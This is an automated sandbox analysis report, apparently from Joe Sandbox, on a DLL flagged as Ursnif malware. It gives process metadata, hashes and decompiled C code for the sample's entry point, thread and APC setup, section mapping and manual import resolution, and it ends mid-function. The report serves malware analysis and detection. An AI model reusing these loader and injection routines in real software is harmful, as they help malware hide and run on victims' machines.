Commandline:	loaddll32.exe 'C:\Users\user\Desktop\OgQJzDbLce.dll'
Imagebase:	0xb00000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 6572 Parent PID: 800

General

Start time:	19:18:14
Start date:	11/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff70f2b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6832 Parent PID: 6572

General

Start time:	19:18:14
Start date:	11/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6572 CREDAT:17410 /prefetch:2
Imagebase:	0x260000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6392 Parent PID: 800

General

Start time:	19:18:57
Start date:	11/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff70f2b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4632 Parent PID: 6392

General

Start time:	19:18:58
Start date:	11/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6392 CREDAT:17410 /prefetch:2
Imagebase:	0x260000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3480 Parent PID: 800

General

Start time:	19:19:34
Start date:	11/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff70f2b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6284 Parent PID: 3480

General

Start time:	19:19:34
Start date:	11/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3480 CREDAT:17410 /prefetch:2
Imagebase:	0x260000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6128 Parent PID: 800

General

Start time:	19:19:57
Start date:	11/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff70f2b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6708 Parent PID: 6128

General

Start time:	19:19:57
Start date:	11/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6128 CREDAT:17410 /prefetch:2
Imagebase:	0x260000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6140 Parent PID: 6032 loaddll32.exeCOMMON

Executed Functions

Function 100019C7, Relevance: 24.1, APIs: 16, Instructions: 120
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E100019C7(void* __edi, long _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				void* _v48;
				long _t25;
				int _t27;
				long _t30;
				long _t31;
				void* _t32;
				long _t35;
				long _t36;
				long _t40;
				void* _t45;
				intOrPtr _t48;
				signed int _t53;
				void* _t58;
				signed int _t61;
				void* _t64;
				intOrPtr* _t65;

				_t25 = E10001799();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					GetSystemTime( &_v24);
					_t27 = SwitchToThread();
					asm("cdq");
					_t53 = 9;
					_t61 = _t27 + (_v24.wMilliseconds & 0x0000ffff) % _t53;
					_t30 = E1000167E(__edi, _t61); // executed
					_v8 = _t30;
					Sleep(_t61 << 5); // executed
					_t31 = _v8;
				} while (_t31 == 0xc);
				if(_t31 != 0) {
					L21:
					return _t31;
				}
				_push(__edi);
				if(_a4 != 0) {
					L11:
					_t32 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, 0); // executed
					_t64 = _t32;
					if(_t64 == 0) {
						L18:
						_v8 = GetLastError();
						L19:
						_t31 = _v8;
						if(_t31 == 0xffffffff) {
							_t31 = GetLastError();
						}
						goto L21;
					}
					_t35 = QueueUserAPC(E1000133E, _t64,  &_v48); // executed
					if(_t35 == 0) {
						_t40 = GetLastError();
						_a4 = _t40;
						TerminateThread(_t64, _t40);
						CloseHandle(_t64);
						_t64 = 0;
						SetLastError(_a4);
					}
					if(_t64 == 0) {
						goto L18;
					} else {
						_t36 = WaitForSingleObject(_t64, 0xffffffff);
						_v8 = _t36;
						if(_t36 == 0) {
							GetExitCodeThread(_t64,  &_v8);
						}
						CloseHandle(_t64);
						goto L19;
					}
				}
				if(E10001C6E(_t53,  &_a4) != 0) {
					 *0x10004138 = 0;
					goto L11;
				}
				_t65 = __imp__GetLongPathNameW;
				_t45 =  *_t65(_a4, 0, 0); // executed
				_t58 = _t45;
				if(_t58 == 0) {
					L9:
					 *0x10004138 = _a4;
					goto L11;
				}
				_t14 = _t58 + 2; // 0x2
				_t48 = E10001669(_t58 + _t14);
				 *0x10004138 = _t48;
				if(_t48 == 0) {
					goto L9;
				}
				 *_t65(_a4, _t48, _t58); // executed
				E10001E78(_a4);
				goto L11;
			}

0x100019ce
0x100019d5
0x100019da
0x10001b0a
0x10001b0a
0x100019e1
0x100019e5
0x100019eb
0x100019f9
0x100019fa
0x100019fd
0x10001a00
0x10001a09
0x10001a0c
0x10001a12
0x10001a15
0x10001a1c
0x10001b07
0x00000000
0x10001b07
0x10001a22
0x10001a26
0x10001a7c
0x10001a8c
0x10001a92
0x10001a9c
0x10001af7
0x10001af9
0x10001afc
0x10001afc
0x10001b03
0x10001b05
0x10001b05
0x00000000
0x10001b03
0x10001aa8
0x10001ab6
0x10001ab8
0x10001abc
0x10001abf
0x10001ac6
0x10001acb
0x10001acd
0x10001acd
0x10001ad5
0x00000000
0x10001ad7
0x10001ada
0x10001ae0
0x10001ae5
0x10001aec
0x10001aec
0x10001af3
0x00000000
0x10001af3
0x10001ad5
0x10001a33
0x10001a76
0x00000000
0x10001a76
0x10001a35
0x10001a40
0x10001a42
0x10001a46
0x10001a6c
0x10001a6f
0x00000000
0x10001a6f
0x10001a48
0x10001a4d
0x10001a52
0x10001a59
0x00000000
0x00000000
0x10001a60
0x10001a65
0x00000000

APIs

Part of subcall function 10001799: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,100019D3), ref: 100017A8
Part of subcall function 10001799: GetVersion.KERNEL32(?,100019D3), ref: 100017B7
Part of subcall function 10001799: GetCurrentProcessId.KERNEL32(?,100019D3), ref: 100017D3
Part of subcall function 10001799: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,100019D3), ref: 100017EC

GetSystemTime.KERNEL32(?), ref: 100019E5
SwitchToThread.KERNEL32 ref: 100019EB

Part of subcall function 1000167E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,10001A05,?,00000000,?,?,?,?,?,?,?,10001A05), ref: 100016D4
Part of subcall function 1000167E: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,10001A05,00000000), ref: 10001766
Part of subcall function 1000167E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,10001A05), ref: 10001781

Sleep.KERNELBASE(00000000,00000000), ref: 10001A0C
GetLongPathNameW.KERNEL32 ref: 10001A40
GetLongPathNameW.KERNEL32 ref: 10001A60
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 10001A8C
QueueUserAPC.KERNELBASE(1000133E,00000000,?), ref: 10001AA8
GetLastError.KERNEL32 ref: 10001AB8
TerminateThread.KERNEL32(00000000,00000000), ref: 10001ABF
CloseHandle.KERNEL32(00000000), ref: 10001AC6
SetLastError.KERNEL32(?), ref: 10001ACD
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10001ADA
GetExitCodeThread.KERNEL32(00000000,?), ref: 10001AEC
CloseHandle.KERNEL32(00000000), ref: 10001AF3
GetLastError.KERNEL32 ref: 10001AF7
GetLastError.KERNEL32 ref: 10001B05

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
String ID:
API String ID: 2478182988-0
Opcode ID: fa1ee72ffcd87df28d4980db385e47b2fea2ca39d0f496df63b7363508c87dfc
Instruction ID: 4aef50b4a7eb8dd860cd90a223b160882761c3e146f8e067f7313366ed264c2c
Opcode Fuzzy Hash: fa1ee72ffcd87df28d4980db385e47b2fea2ca39d0f496df63b7363508c87dfc
Instruction Fuzzy Hash: 143150B5902129BFF701EFB5CCC89DF7BACEB092D47118526F905D2158E7309E419BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001DD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10001DD0(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E10001812(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x10001dd9
0x10001de0
0x10001de1
0x10001de2
0x10001de3
0x10001de4
0x10001df5
0x10001df9
0x10001e0d
0x10001e10
0x10001e13
0x10001e1a
0x10001e1d
0x10001e24
0x10001e27
0x10001e2a
0x10001e2d
0x10001e32
0x10001e6d
0x10001e34
0x10001e37
0x10001e3d
0x10001e42
0x10001e46
0x10001e64
0x10001e48
0x10001e4f
0x10001e5d
0x10001e5d
0x10001e46
0x10001e75

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 10001E2D

Part of subcall function 10001812: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001E42,00000002,00000000,?,?,00000000,?,?,10001E42,00000002), ref: 1000183F

memset.NTDLL ref: 10001E4F

Strings

@, xrefs: 10001E1D

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 6a036c25c3596289e1496aeb05bd05d7099d0fc69dd2c6ace39beb277248278c
Instruction ID: a7ee5fb51198b84d194c3a9f3c529b392fcfabc5d3c13dd4e92119350f342c38
Opcode Fuzzy Hash: 6a036c25c3596289e1496aeb05bd05d7099d0fc69dd2c6ace39beb277248278c
Instruction Fuzzy Hash: 1C210BB6D00209AFDB11CFA9C8849DEFBB9EB48294F508429E605F7210D730AA448B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001812, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10001812(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x10001824
0x1000182a
0x10001838
0x1000183f
0x10001844
0x1000184a
0x00000000
0x1000184b
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001E42,00000002,00000000,?,?,00000000,?,?,10001E42,00000002), ref: 1000183F

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 6d1e1847bffdb7ea578f335206b8a95dbb6c7942dd4018a96a037df7c49ea5ed
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 8BF030B690020DFFEB119FA5CC85CDFBBBDEB44394B108939F552E2095DA309E089B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001266, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10001266(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002070();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10004144;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000206A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x10001266
0x1000126f
0x10001273
0x10001279
0x1000127e
0x10001283
0x10001286
0x10001289
0x1000128e
0x1000128f
0x10001292
0x1000129d
0x100012a4
0x100012a8
0x100012aa
0x100012ab
0x100012ae
0x100012b3
0x100012bd
0x100012bf
0x100012bf
0x100012d3
0x100012d9
0x100012dd
0x1000132d
0x100012df
0x100012e8
0x100012fe
0x10001306
0x10001318
0x1000131c
0x00000000
0x00000000
0x10001308
0x1000130b
0x10001310
0x10001312
0x10001312
0x100012f3
0x100012f5
0x1000131e
0x1000131f
0x1000131f
0x100012e8
0x10001335

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?,?), ref: 10001273
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001289
_snwprintf.NTDLL ref: 100012AE
CreateFileMappingW.KERNELBASE(000000FF,10004148,00000004,00000000,?,?), ref: 100012D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?), ref: 100012EA
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 100012FE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?), ref: 10001316
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A), ref: 1000131F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100013B7,0000000A,?), ref: 10001327

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: aca8c327238908b6bb845b651303a48220addb25810d7f689fd15986140cd55b
Instruction ID: 23014b8b4f9051bbbcbfa4c64bc6cb21a5997a9fd7696493801a3747896fb516
Opcode Fuzzy Hash: aca8c327238908b6bb845b651303a48220addb25810d7f689fd15986140cd55b
Instruction Fuzzy Hash: C9217FB2A00118BFE711EFA8CC84EDE77ADEB483D1F118135FA15D7158DA719A458B60

Uniqueness

Uniqueness Score: -1.00%

Function 100010DC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010DC(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62); // executed
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x100010e5
0x100010eb
0x100010f0
0x100010f5
0x100011f6
0x100011fb
0x100011fb
0x100010fc
0x100010ff
0x10001102
0x10001107
0x100011f5
0x00000000
0x100011f5
0x1000110e
0x1000110e
0x10001112
0x10001118
0x1000111d
0x00000000
0x00000000
0x10001123
0x10001132
0x10001137
0x10001139
0x1000113c
0x10001141
0x1000114d
0x1000114d
0x10001150
0x10001154
0x100011da
0x100011da
0x100011dd
0x100011e0
0x100011e5
0x00000000
0x00000000
0x100011f4
0x00000000
0x100011f4
0x1000115e
0x10001161
0x00000000
0x10001163
0x10001163
0x1000116c
0x10001181
0x10001183
0x1000117a
0x1000117a
0x1000117a
0x10001165
0x10001165
0x10001165
0x10001186
0x10001186
0x1000118b
0x1000118d
0x1000118d
0x10001195
0x1000119b
0x100011a0
0x00000000
0x00000000
0x100011a4
0x100011a6
0x100011b4
0x100011b9
0x100011b9
0x100011c2
0x100011c5
0x100011c8
0x100011cc
0x00000000
0x100011ce
0x100011d7
0x100011d7
0x00000000
0x100011d7
0x100011d0
0x100011d0
0x00000000
0x100011d0
0x10001143
0x10001147
0x00000000
0x00000000
0x00000000
0x10001147
0x100011ed
0x00000000

APIs

LoadLibraryA.KERNELBASE(?,?,?,00000000,?,?,?,00000002), ref: 10001112
lstrlenA.KERNEL32(?), ref: 10001128
memset.NTDLL ref: 10001132
GetProcAddress.KERNEL32(?,00000002), ref: 10001195
lstrlenA.KERNEL32(-00000002), ref: 100011AA
memset.NTDLL ref: 100011B4

Strings

~, xrefs: 100011ED

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: 863695ba407b188a3801e1a53bb91d28a8b2d30b78f9075b511b3a0e9345712c
Instruction ID: 36b666a509a82521409ce3d951f77a8f70ef17c10a1a7333a504bd0e8306a4b8
Opcode Fuzzy Hash: 863695ba407b188a3801e1a53bb91d28a8b2d30b78f9075b511b3a0e9345712c
Instruction Fuzzy Hash: C6316F76A01616ABEB18CF59DC90AEEB7F4EF443C0F214069EE05DB244EB30EA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10001CF0, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000410c;
						if( *0x1000410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004118;
								if( *0x10004118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000410c);
						}
						HeapDestroy( *0x10004110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x10004110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10004130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E10001C56, E10001561(_a12, 0, 0x10004118, _t41), 0,  &_a8); // executed
							 *0x1000410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x10001cf3
0x10001cff
0x10001d01
0x10001d04
0x10001d7e
0x10001d84
0x10001d86
0x10001d88
0x10001d8e
0x10001d90
0x10001d95
0x10001d98
0x10001da3
0x10001da5
0x00000000
0x00000000
0x10001da7
0x10001daa
0x10001dac
0x00000000
0x00000000
0x00000000
0x10001dac
0x10001db4
0x10001db4
0x10001dc0
0x10001dc0
0x10001d06
0x10001d07
0x10001d27
0x10001d2d
0x10001d32
0x10001d34
0x10001d74
0x10001d74
0x10001d36
0x10001d3e
0x10001d45
0x10001d5e
0x10001d64
0x10001d6b
0x10001d70
0x00000000
0x10001d70
0x10001d6b
0x10001d34
0x10001d07
0x10001dcd

APIs

InterlockedIncrement.KERNEL32(10004108), ref: 10001D12
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001D27
CreateThread.KERNEL32(00000000,00000000,10001C56,00000000,00000000,?), ref: 10001D5E
InterlockedDecrement.KERNEL32(10004108), ref: 10001D7E
SleepEx.KERNEL32(00000064,00000001), ref: 10001D98
CloseHandle.KERNEL32 ref: 10001DB4
HeapDestroy.KERNEL32 ref: 10001DC0

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID:
API String ID: 3416589138-0
Opcode ID: 30ac03b81143d665445cde2889a59d55e2a87aaa08a0f6bb701e3aa90fb78cb0
Instruction ID: 9498d6db21d119f304d1b5f735a85d01eb658a8925806fa2593c798b6c664c0b
Opcode Fuzzy Hash: 30ac03b81143d665445cde2889a59d55e2a87aaa08a0f6bb701e3aa90fb78cb0
Instruction Fuzzy Hash: 282184B1A01255ABF701DF68CCC89DA77F8EB957E17128526F605D3268DB308D80CB94

Uniqueness

Uniqueness Score: -1.00%

Function 100018E1, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100018E1(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E10001669(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x10004144 + 0x10005014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x10004144 + 0x1000514c);
					 *(_t54 + 0xc) = _t28;
